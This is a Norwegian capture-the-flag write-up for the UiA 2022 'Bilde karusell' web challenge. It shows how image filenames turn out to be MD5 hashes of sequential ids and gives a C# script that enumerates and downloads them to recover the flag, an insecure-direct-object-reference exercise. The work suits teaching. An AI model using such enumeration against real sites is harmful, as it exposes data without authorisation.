View on GitHub

Sikkerhetsdagen 2022 CTF @ UiA

Bilde karusell

Bilde karusell

Jeg liker bootstrap sin bilde karusell, gjør ikke du?

ctf.uiactf.no:3003


På nettsiden ser vi følgende:

Dette er en bildekarusell med 3 bilder. Bildene viser en U, en F og en }. Dette er nok deler av flagget.

I kildekoden ser vi referansene til de 3 bildene.

  <!-- Wrapper for slides -->
  <div class="carousel-inner">
   <div class="item active">
    <img src="cfcd208495d565ef66e7dff9f98764da.jpg" alt="U" class="center-block">
   </div>

   <div class="item">
    <img src="e4da3b7fbbce2345d7772b0674a318d5.jpg" alt="F" class="center-block">
   </div>
  
   <div class="item">
    <img src="a5771bce93e200c36f7cd9dfd0e5deaa.jpg" alt="}" class="center-block">
   </div>
  </div>

Vi må finne resten av bildene for å finne resten av flagget.

Vi ser at bildene ikke ligger i en undermappe på domenet, så vi er ikke så heldige at det er en usikret directory listing tilgjengelig…

Neste steg er å ta en nærmere titt på filnavnet for hvert bilde:

cfcd208495d565ef66e7dff9f98764da.jpg
e4da3b7fbbce2345d7772b0674a318d5.jpg
a5771bce93e200c36f7cd9dfd0e5deaa.jpg

Dette ser ut som en hash av et eller annet slag. Jeg tipper MD5. La oss sjekke hashene på https://crackstation.net/:

Det var akkurat som jeg håpet! Hashene er MD5 hasher og de er generert fra en løpende teller. Det betyr at vi enkelt kan generere de resterende hashene og laste ned de resterende delene av flagget.

Vi kan gjøre en sanity check på fremgangsmåten vår før vi fortsetter:

$ echo -n "0" | md5sum
cfcd208495d565ef66e7dff9f98764da -

Ser bra ut, hashen for 0 matcher hashen for U-bildet ovenfor.

La oss kalkulere MD5-hashen av 1 og se om vi finner I-bildet:

$ echo -n "1" | md5sum
c4ca4238a0b923820dcc509a6f75849b -

Dette ser veldig lovende ut. La oss automatisere nedlasting av de resterende bildene.

Denne gangen skriver jeg et skript i C#. LINQPad er perfekt til formålet:

Skriptet i tekstform:

var baseUrl = "http://ctf.uiactf.no:3003/";
var c = new HttpClient();
var md5 = MD5.Create();

for (int i = 0; i < 39; i++)
{
	var hash = BitConverter.ToString(md5.ComputeHash(System.Text.Encoding.UTF8.GetBytes($"{i}"))).Replace("-", "").ToLower();
	hash.Dump();
	var s = await c.GetStreamAsync($"{baseUrl}{hash}.jpg");
	var b = new Bitmap(s);
	b.Save($@"\\wsl.localhost\kali-linux\home\hag\ctf-uia-no-2022\bilde-karusell\bilder\{i:D2}.jpg");
	
	b.Dump();
}

Dette skriptet itererer gjennom id 0 til 38 og MD5-hashene kalkuleres. Deretter lastes bildene ned til et bildeobjekt og lagres på harddisken i tillegg til å vises i LINQPad ved hjelp av Dump().

Når vi åpner mappen med alle bildene er det ganske enkelt å lese ut hele flagget:

Flag

UIACTF{Usikre direkte objektreferanser}